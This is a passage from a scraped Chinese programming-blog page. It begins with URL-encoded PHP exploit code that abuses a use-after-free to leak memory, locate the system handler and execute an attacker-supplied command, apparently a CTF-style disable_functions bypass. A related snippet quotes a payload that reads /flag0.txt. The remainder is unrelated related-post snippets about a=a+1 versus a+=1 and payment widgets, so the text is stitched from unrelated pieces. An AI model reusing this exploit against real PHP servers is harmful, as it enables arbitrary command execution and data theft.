%0a++++++++++++++++++++continue%3b%0a++++++++++++%7d+else+continue%3b%0a%0a++++++++++++%24leak+%3d+leak(%24data_addr%2c+(%24i+%2b+4)+*+8)%3b%0a++++++++++++if(%24leak+-+%24base+%3e+0+%26%26+%24leak+-+%24base+%3c+%24data_addr+-+%24base)+%7b%0a++++++++++++++++%24deref+%3d+leak(%24leak)%3b%0a++++++++++++++++%23+%27bin2hex%27+constant+check%0a++++++++++++++++if(%24deref+!%3d+0x786568326e6962)%0a++++++++++++++++++++continue%3b%0a++++++++++++%7d+else+continue%3b%0a%0a++++++++++++return+%24data_addr+%2b+%24i+*+8%3b%0a++++++++%7d%0a++++%7d%0a%0a++++function+get_binary_base(%24binary_leak)+%7b%0a++++++++%24base+%3d+0%3b%0a++++++++%24start+%3d+%24binary_leak+%26+0xfffffffffffff000%3b%0a++++++++for(%24i+%3d+0%3b+%24i+%3c+0x1000%3b+%24i%2b%2b)+%7b%0a++++++++++++%24addr+%3d+%24start+-+0x1000+*+%24i%3b%0a++++++++++++%24leak+%3d+leak(%24addr%2c+0%2c+7)%3b%0a++++++++++++if(%24leak+%3d%3d+0x10102464c457f)+%7b+%23+ELF+header%0a++++++++++++++++return+%24addr%3b%0a++++++++++++%7d%0a++++++++%7d%0a++++%7d%0a%0a++++function+get_system(%24basic_funcs)+%7b%0a++++++++%24addr+%3d+%24basic_funcs%3b%0a++++++++do+%7b%0a++++++++++++%24f_entry+%3d+leak(%24addr)%3b%0a++++++++++++%24f_name+%3d+leak(%24f_entry%2c+0%2c+6)%3b%0a%0a++++++++++++if(%24f_name+%3d%3d+0x6d6574737973)+%7b+%23+system%0a++++++++++++++++return+leak(%24addr+%2b+8)%3b%0a++++++++++++%7d%0a++++++++++++%24addr+%2b%3d+0x20%3b%0a++++++++%7d+while(%24f_entry+!%3d+0)%3b%0a++++++++return+false%3b%0a++++%7d%0a%0a++++function+trigger_uaf(%24arg)+%7b%0a++++++++%23+str_shuffle+prevents+opcache+string+interning%0a++++++++%24arg+%3d+str_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a++++++++%24vuln+%3d+new+Vuln()%3b%0a++++++++%24vuln-%3ea+%3d+%24arg%3b%0a++++%7d%0a%0a++++if(stristr(PHP_OS%2c+%27WIN%27))+%7b%0a++++++++die(%27This+PoC+is+for+*nix+systems+only.%27)%3b%0a++++%7d%0a%0a++++%24n_alloc+%3d+10%3b+%23+increase+this+value+if+UAF+fails%0a++++%24contiguous+%3d+%5b%5d%3b%0a++++for(%24i+%3d+0%3b+%24i+%3c+%24n_alloc%3b+%24i%2b%2b)%0a++++++++%24contiguous%5b%5d+%3d+str_shuffle(%27AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%27)%3b%0a%0a++++trigger_uaf(%27x%27)%3b%0a++++%24abc+%3d+%24backtrace%5b1%5d%5b%27args%27%5d%5b0%5d%3b%0a%0a++++%24helper+%3d+new+Helper%3b%0a++++%24helper-%3eb+%3d+function+(%24x)+%7b+%7d%3b%0a%0a++++if(strlen(%24abc)+%3d%3d+79+%7c%7c+strlen(%24abc)+%3d%3d+0)+%7b%0a++++++++die(%22UAF+failed%22)%3b%0a++++%7d%0a%0a++++%23+leaks%0a++++%24closure_handlers+%3d+str2ptr(%24abc%2c+0)%3b%0a++++%24php_heap+%3d+str2ptr(%24abc%2c+0x58)%3b%0a++++%24abc_addr+%3d+%24php_heap+-+0xc8%3b%0a%0a++++%23+fake+value%0a++++write(%24abc%2c+0x60%2c+2)%3b%0a++++write(%24abc%2c+0x70%2c+6)%3b%0a%0a++++%23+fake+reference%0a++++write(%24abc%2c+0x10%2c+%24abc_addr+%2b+0x60)%3b%0a++++write(%24abc%2c+0x18%2c+0xa)%3b%0a%0a++++%24closure_obj+%3d+str2ptr(%24abc%2c+0x20)%3b%0a%0a++++%24binary_leak+%3d+leak(%24closure_handlers%2c+8)%3b%0a++++if(!(%24base+%3d+get_binary_base(%24binary_leak)))+%7b%0a++++++++die(%22Couldn%27t+determine+binary+base+address%22)%3b%0a++++%7d%0a%0a++++if(!(%24elf+%3d+parse_elf(%24base)))+%7b%0a++++++++die(%22Couldn%27t+parse+ELF+header%22)%3b%0a++++%7d%0a%0a++++if(!(%24basic_funcs+%3d+get_basic_funcs(%24base%2c+%24elf)))+%7b%0a++++++++die(%22Couldn%27t+get+basic_functions+address%22)%3b%0a++++%7d%0a%0a++++if(!(%24zif_system+%3d+get_system(%24basic_funcs)))+%7b%0a++++++++die(%22Couldn%27t+get+zif_system+address%22)%3b%0a++++%7d%0a%0a++++%23+fake+closure+object%0a++++%24fake_obj_offset+%3d+0xd0%3b%0a++++for(%24i+%3d+0%3b+%24i+%3c+0x110%3b+%24i+%2b%3d+8)+%7b%0a++++++++write(%24abc%2c+%24fake_obj_offset+%2b+%24i%2c+leak(%24closure_obj%2c+%24i))%3b%0a++++%7d%0a%0a++++%23+pwn%0a++++write(%24abc%2c+0x20%2c+%24abc_addr+%2b+%24fake_obj_offset)%3b%0a++++write(%24abc%2c+0xd0+%2b+0x38%2c+1%2c+4)%3b+%23+internal+func+type%0a++++write(%24abc%2c+0xd0+%2b+0x68%2c+%24zif_system)%3b+%23+internal+func+handler%0a%0a++++(%24helper-%3eb)(%24cmd)%3b%0a++++exit()%3b%0a%7d有什么区别
01-05
我们来一步步分析这两个 payload 的区别。 --- ### 第一步:URL 解码 我们先对两个 payload 进行 **URL 解码**: #### Payload 1(`c=%3F%3E...`)解码后: ```php pwn("ls /;cat /flag0.txt"); function pwn...
int+a+=+0,+b+=+0; for+(a+=+1,+b+=+1;+a+<=+100;+a++) { ++++if+(b+>=+20)+break; ++++if+(b+%+3+==+1
12-05
1. a++++a的区别在于返回值不同,前者返回原始值,后者返回自增后的值。 2. a+=b和a=a+b的区别在于前者改变了a原始的值,后者计算出a+b后再赋值给a。 3. int+a+=+0表示将a的值加上0,即不改变a的值;+b+=+0同理。 ...
a=a+1,a+=1区别
dmwhw的博客
10-24 2824
a=a+1,是先取a的值,在进行加加操作。它等同于a++; a+=1,是先对a进行加1操作,在返回a的值。它等同于++a; 然而汇编是一样的代码。
a = a+1与a += 1区别
m0_49889089的博客
01-04 966
a = a+1与a += 1区别
a++与 a+=1的问题
KingOdin的博客
09-10 602
java 自增与赋值的问题
最近在面试题上面看到a = a+1与a+=1有什么区别
qq_39419353的博客
06-03 1177
最近在面试题上面看到a = a+1与a+=1有什么区别,咋一看,好像没啥区别,查了一下资料,其实是有区别的。在此记录一下。 对于short a= 1;a = a+1来说会报错,a+1运算时会自动提升表达式的类型为int类型,即a+1会转换成int类型,而a是short类型,int类型不能转换成short,会出现类型转换错误。 对于short a= 1;a +=1来说,“+=”是java中的一个运算符,在运算时 会进行自动类型转换。所以在编译时没有报错。 ...
a+=1与a=a+1区别
weixin_38399867的博客
12-16 1241
1+=效率高 2:a+=b;//  返回的是a类型 3:a=a+b ;//返回的是a与b的最高类型
a = a + 1与a + = 1区别
it_boyge的博客
11-19 668
a = a + 1与a + = 1区别
课后甜点之a = a+1和a += 1区别
ql_7256的博客
07-09 1394
对于a = a + 1和a += 1,相信大家都用过,效果上,都是差不多的,都可以对a进行加一操作。 但是也是有区别的,不信可以运行一下下面的代码 byte a = 1; a = a + 1;//报错,编译无法通过 a += 1;//正常,编译可以通过,并且程序正常运行 因为java中有个机制byte、short或char在做算数运算的时候,会先自动上升为int类型,然后再做运算,所以第二行得到的结果是一个int的数据,但是却要将它赋值个一个byte类型的变
程序是如何执行的(一)a=a+1
weixin_33804582的博客
12-18 451
本文链接:http://www.orlion.ml/35/ 一、概述 1、计算机中有两个主要的核心部件:CPU和内存,其中CPU负责运算而内存负责存储程序和相关的变量,每一条程序语句和变量都在内存中有对应的内存地址。 2、寄存器是CPU的存储单元,每一个CPU都会有通用寄存器来给程序使用,编号R1~R32,代表有32个通用寄存器。 3、CPU中的核心部件 (1)程序计数器PC(Progr...
a++++a;a+=和a=a+1区别
weixin_45980070的博客
06-12 2278
a++++a的区别 看谁在前面,符号在前面,先自增,然后用自增的值和接下来的值做运算 ​ 变量在前面,先用变量的值和其他的值做运算,然后再让他自增 a–,和–a同上 a++: 先取值,再自增 int a=18; System.out.println(2+a++);//20 第一步执行:18+2=20 第二步执行:a=18+1 System.out.println(a);//19 ++a(先自增再取值) int a=18; System.out.println(2+(++a));//21 第一步执行:a
b += a++ + c;C语言中计算优先级
03-30
1. 计算`a++`的值,即先使用`a`的当前值,然后将`a`自增1。 2. 将`a++`的结果与`c`相加,得到中间结果。 3. 将中间结果加到`b`上,并赋值给`b`,即`b = b + (中间结果)`。 需要注意的是,后缀自增是在表达式计算...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值